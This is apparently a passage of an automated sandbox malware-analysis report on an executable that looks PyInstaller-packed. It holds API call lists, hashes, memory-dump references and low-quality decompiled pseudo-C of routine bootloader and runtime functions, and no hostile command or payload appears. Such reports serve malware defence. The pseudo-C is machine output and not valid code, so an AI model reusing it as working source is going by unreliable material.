                                                                                                                                                                                                                                                        0x7ff6e5ab656a
                                                                                                                                                                                                                                                        0x7ff6e5ab656f
                                                                                                                                                                                                                                                        0x7ff6e5ab6575
                                                                                                                                                                                                                                                        0x7ff6e5ab6577
                                                                                                                                                                                                                                                        0x7ff6e5ab6597
                                                                                                                                                                                                                                                        0x7ff6e5ab65a6
                                                                                                                                                                                                                                                        0x7ff6e5ab65b1
                                                                                                                                                                                                                                                        0x7ff6e5ab65b5
                                                                                                                                                                                                                                                        0x7ff6e5ab65c0
                                                                                                                                                                                                                                                        0x7ff6e5ab65f0

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB7A30: MultiByteToWideChar.KERNEL32 ref: 00007FF6E5AB7A6A
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6E5AB67CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF6E5AB64DF
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2770: MessageBoxW.USER32 ref: 00007FF6E5AB2841
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6E5AB653A
                                                                                                                                                                                                                                                        • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6E5AB64F3
                                                                                                                                                                                                                                                        • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6E5AB64B6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                        • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                        • Opcode ID: e770f63f1b65fbf44ebddb50d5af86b3d9fe6b483d73fb8ce13bd60b0e8df226
                                                                                                                                                                                                                                                        • Instruction ID: 1ee684e6e93a1924835c91b70f170dd3eea37da358a3e013ed0985c2406cd49b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e770f63f1b65fbf44ebddb50d5af86b3d9fe6b483d73fb8ce13bd60b0e8df226
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2231CC13B18B4641FA60BB29E5753B95251AF48F80F840031DA4EC77DEEE2EED04874A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF6E5AB7A6A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E5AB7744,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB2654
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2620: MessageBoxW.USER32 ref: 00007FF6E5AB272C
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF6E5AB7AF0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                        • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                        • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                                                                                                                                                        • Instruction ID: 3542334015d213e1acd8c7dda0bd6d3a8fa6e19febe603df40dd0fca7452cf49
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B217523B08A4241EB50EB1DF420279A361FF88B88F984535DF5CC3B69EE6DD9518B05
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA62F
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA644
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA665
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA692
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA6A3
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA6B4
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F,?,?,?,00007FF6E5AC9313), ref: 00007FF6E5ACA6CF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: f2c5455f2f9a109e47e50351e833d66c738fc61c61e7ebd280de627866fe46d0
                                                                                                                                                                                                                                                        • Instruction ID: 5984a7d29981b92c08d114e6c2a9da1605c4cab9ff682b794f83cd010417371e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2c5455f2f9a109e47e50351e833d66c738fc61c61e7ebd280de627866fe46d0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63214C22B0C64245FB65AB299A7137962925F44FA0F044734D93ECF6D6DF2EBC50460B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                        • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                                                                                                                                                                                                                        • Instruction ID: d98fdc2087d4b475f6dd974052910938bf8a7ec47794e8a4fbad9cf70ab8fb36
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4118432B18A4186E7509B1AE86432972A0FF48FE8F444234ED5DC7794DF7DD9448B49
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6E5AC444D,?,?,?,?,00007FF6E5ACDDA7,?,?,00000000,00007FF6E5ACA8B6,?,?,?), ref: 00007FF6E5ACA7A7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC444D,?,?,?,?,00007FF6E5ACDDA7,?,?,00000000,00007FF6E5ACA8B6,?,?,?), ref: 00007FF6E5ACA7DD
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC444D,?,?,?,?,00007FF6E5ACDDA7,?,?,00000000,00007FF6E5ACA8B6,?,?,?), ref: 00007FF6E5ACA80A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC444D,?,?,?,?,00007FF6E5ACDDA7,?,?,00000000,00007FF6E5ACA8B6,?,?,?), ref: 00007FF6E5ACA81B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC444D,?,?,?,?,00007FF6E5ACDDA7,?,?,00000000,00007FF6E5ACA8B6,?,?,?), ref: 00007FF6E5ACA82C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6E5AC444D,?,?,?,?,00007FF6E5ACDDA7,?,?,00000000,00007FF6E5ACA8B6,?,?,?), ref: 00007FF6E5ACA847
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 77c710a10a45791970bdf576ac679a541b6ea386f6a0c419fe7b27c6a8051ade
                                                                                                                                                                                                                                                        • Instruction ID: 1f707f32d94cde28ab109e26a13881ff0172149b6959b85271e986aca2057658
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77c710a10a45791970bdf576ac679a541b6ea386f6a0c419fe7b27c6a8051ade
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF116F22F0C24246F755AB29997137912925F44FB0F044334D93ECF6D6DF2EAC41870A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABC8A8(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                        				void* _t118;
                                                                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                                                                        				long long _t133;
                                                                                                                                                                                                                                                        				intOrPtr* _t135;
                                                                                                                                                                                                                                                        				signed long long _t144;
                                                                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                                                                        				signed long long _t154;
                                                                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                                                                        				long long _t158;
                                                                                                                                                                                                                                                        				intOrPtr* _t159;
                                                                                                                                                                                                                                                        				void* _t161;
                                                                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                                                                        				signed long long _t166;
                                                                                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                                                                                        				intOrPtr _t171;
                                                                                                                                                                                                                                                        				void* _t173;
                                                                                                                                                                                                                                                        				void* _t174;
                                                                                                                                                                                                                                                        				void* _t176;
                                                                                                                                                                                                                                                        				void* _t178;
                                                                                                                                                                                                                                                        				void* _t180;
                                                                                                                                                                                                                                                        				intOrPtr* _t181;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t130 = __rax;
                                                                                                                                                                                                                                                        				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                                                                                                                                                                                        				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				_t162 = _t161 - 0x40;
                                                                                                                                                                                                                                                        				_t159 = __rcx;
                                                                                                                                                                                                                                                        				_t181 = __r9;
                                                                                                                                                                                                                                                        				_t174 = __rdx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCCC4(_t76, __r8);
                                                                                                                                                                                                                                                        				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                                                                        				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                                                                                                                                                                        				_t178 =  *__r9 - _t171;
                                                                                                                                                                                                                                                        				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                                                                                                                                                                                        				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xe5abc9d0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                                                                                                                                                                                        				if (_t103 -  *_t135 >= 0) goto 0xe5abca7c;
                                                                                                                                                                                                                                                        				_t154 = __r8 + __r8;
                                                                                                                                                                                                                                                        				if (_t178 - _t130 < 0) goto 0xe5abc9c2;
                                                                                                                                                                                                                                                        				if (_t178 - _t130 >= 0) goto 0xe5abc9c2;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0xe5abc9c2;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0xe5abc94e;
                                                                                                                                                                                                                                                        				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                                                                                                                                                                                        				if (_t113 < 0) goto 0xe5abc9c9;
                                                                                                                                                                                                                                                        				if (_t113 <= 0) goto 0xe5abc9c2;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0xe5abc97f;
                                                                                                                                                                                                                                                        				if ( *0xe5ae0520 == 0) goto 0xe5abc97f;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD8FC0(_t130 + _t171, _t135, 0xe5ae0520) == 0) goto 0xe5abc97f;
                                                                                                                                                                                                                                                        				_t83 =  *0xe5ae0520();
                                                                                                                                                                                                                                                        				r8d = 1;
                                                                                                                                                                                                                                                        				_t84 = E00007FF67FF6E5ABCC90(_t83, _t159 + _t171, _t174);
                                                                                                                                                                                                                                                        				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                                                                                                                                                                                        				r9d =  *_t159;
                                                                                                                                                                                                                                                        				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                                                                                                                                                                        				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                                                                                                                                                                        				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                                                                                                                                                                                        				__imp__RtlUnwindEx();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCCC0(_t84);
                                                                                                                                                                                                                                                        				goto 0xe5abc8fe;
                                                                                                                                                                                                                                                        				goto 0xe5abca81;
                                                                                                                                                                                                                                                        				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                                                                                                                                                                                        				goto 0xe5abca72;
                                                                                                                                                                                                                                                        				_t144 = _t174 + _t174;
                                                                                                                                                                                                                                                        				if (_t178 - _t133 < 0) goto 0xe5abca70;
                                                                                                                                                                                                                                                        				_t118 = _t178 - _t133;
                                                                                                                                                                                                                                                        				if (_t118 >= 0) goto 0xe5abca70;
                                                                                                                                                                                                                                                        				r10d =  *(_t159 + 4);
                                                                                                                                                                                                                                                        				r10d = r10d & 0x00000020;
                                                                                                                                                                                                                                                        				if (_t118 == 0) goto 0xe5abca45;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				if (_t101 == 0) goto 0xe5abca40;
                                                                                                                                                                                                                                                        				r8d = r9d;
                                                                                                                                                                                                                                                        				_t166 = _t159 + _t159;
                                                                                                                                                                                                                                                        				if (_t156 - _t133 < 0) goto 0xe5abca38;
                                                                                                                                                                                                                                                        				if (_t156 - _t133 >= 0) goto 0xe5abca38;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0xe5abca38;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0xe5abca40;
                                                                                                                                                                                                                                                        				r9d = r9d + 1;
                                                                                                                                                                                                                                                        				if (r9d - _t101 < 0) goto 0xe5abca08;
                                                                                                                                                                                                                                                        				if (r9d != _t101) goto 0xe5abca7c;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0xe5abca59;
                                                                                                                                                                                                                                                        				if (_t156 != _t133) goto 0xe5abca70;
                                                                                                                                                                                                                                                        				if (r10d != 0) goto 0xe5abca7c;
                                                                                                                                                                                                                                                        				goto 0xe5abca70;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                                                                                                                                                                                        				 *((long long*)(_t166 + _t171))();
                                                                                                                                                                                                                                                        				if (_t103 + 2 -  *_t135 < 0) goto 0xe5abc9dc;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}






























                                                                                                                                                                                                                                                        0x7ff6e5abc8a8
                                                                                                                                                                                                                                                        0x7ff6e5abc8a8
                                                                                                                                                                                                                                                        0x7ff6e5abc8ad
                                                                                                                                                                                                                                                        0x7ff6e5abc8b2
                                                                                                                                                                                                                                                        0x7ff6e5abc8c0
                                                                                                                                                                                                                                                        0x7ff6e5abc8c4
                                                                                                                                                                                                                                                        0x7ff6e5abc8c7
                                                                                                                                                                                                                                                        0x7ff6e5abc8d0
                                                                                                                                                                                                                                                        0x7ff6e5abc8d3
                                                                                                                                                                                                                                                        0x7ff6e5abc8d8
                                                                                                                                                                                                                                                        0x7ff6e5abc8df
                                                                                                                                                                                                                                                        0x7ff6e5abc8e3
                                                                                                                                                                                                                                                        0x7ff6e5abc8ea
                                                                                                                                                                                                                                                        0x7ff6e5abc8ee
                                                                                                                                                                                                                                                        0x7ff6e5abc8f4
                                                                                                                                                                                                                                                        0x7ff6e5abc8f9
                                                                                                                                                                                                                                                        0x7ff6e5abc900
                                                                                                                                                                                                                                                        0x7ff6e5abc908
                                                                                                                                                                                                                                                        0x7ff6e5abc912
                                                                                                                                                                                                                                                        0x7ff6e5abc91f
                                                                                                                                                                                                                                                        0x7ff6e5abc92a
                                                                                                                                                                                                                                                        0x7ff6e5abc935
                                                                                                                                                                                                                                                        0x7ff6e5abc948
                                                                                                                                                                                                                                                        0x7ff6e5abc94a
                                                                                                                                                                                                                                                        0x7ff6e5abc94c
                                                                                                                                                                                                                                                        0x7ff6e5abc955
                                                                                                                                                                                                                                                        0x7ff6e5abc95f
                                                                                                                                                                                                                                                        0x7ff6e5abc96f
                                                                                                                                                                                                                                                        0x7ff6e5abc979
                                                                                                                                                                                                                                                        0x7ff6e5abc983
                                                                                                                                                                                                                                                        0x7ff6e5abc98f
                                                                                                                                                                                                                                                        0x7ff6e5abc99b
                                                                                                                                                                                                                                                        0x7ff6e5abc9a2
                                                                                                                                                                                                                                                        0x7ff6e5abc9a9
                                                                                                                                                                                                                                                        0x7ff6e5abc9ae
                                                                                                                                                                                                                                                        0x7ff6e5abc9b2
                                                                                                                                                                                                                                                        0x7ff6e5abc9b7
                                                                                                                                                                                                                                                        0x7ff6e5abc9bd
                                                                                                                                                                                                                                                        0x7ff6e5abc9c4
                                                                                                                                                                                                                                                        0x7ff6e5abc9cb
                                                                                                                                                                                                                                                        0x7ff6e5abc9d4
                                                                                                                                                                                                                                                        0x7ff6e5abc9d7
                                                                                                                                                                                                                                                        0x7ff6e5abc9de
                                                                                                                                                                                                                                                        0x7ff6e5abc9e8
                                                                                                                                                                                                                                                        0x7ff6e5abc9f2
                                                                                                                                                                                                                                                        0x7ff6e5abc9f5
                                                                                                                                                                                                                                                        0x7ff6e5abc9f7
                                                                                                                                                                                                                                                        0x7ff6e5abc9fb
                                                                                                                                                                                                                                                        0x7ff6e5abc9ff
                                                                                                                                                                                                                                                        0x7ff6e5abca01
                                                                                                                                                                                                                                                        0x7ff6e5abca06
                                                                                                                                                                                                                                                        0x7ff6e5abca08
                                                                                                                                                                                                                                                        0x7ff6e5abca0b
                                                                                                                                                                                                                                                        0x7ff6e5abca16
                                                                                                                                                                                                                                                        0x7ff6e5abca20
                                                                                                                                                                                                                                                        0x7ff6e5abca2b
                                                                                                                                                                                                                                                        0x7ff6e5abca36
                                                                                                                                                                                                                                                        0x7ff6e5abca38
                                                                                                                                                                                                                                                        0x7ff6e5abca3e
                                                                                                                                                                                                                                                        0x7ff6e5abca43
                                                                                                                                                                                                                                                        0x7ff6e5abca4b
                                                                                                                                                                                                                                                        0x7ff6e5abca50
                                                                                                                                                                                                                                                        0x7ff6e5abca55
                                                                                                                                                                                                                                                        0x7ff6e5abca57
                                                                                                                                                                                                                                                        0x7ff6e5abca5f
                                                                                                                                                                                                                                                        0x7ff6e5abca63
                                                                                                                                                                                                                                                        0x7ff6e5abca6d
                                                                                                                                                                                                                                                        0x7ff6e5abca76
                                                                                                                                                                                                                                                        0x7ff6e5abca9e

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
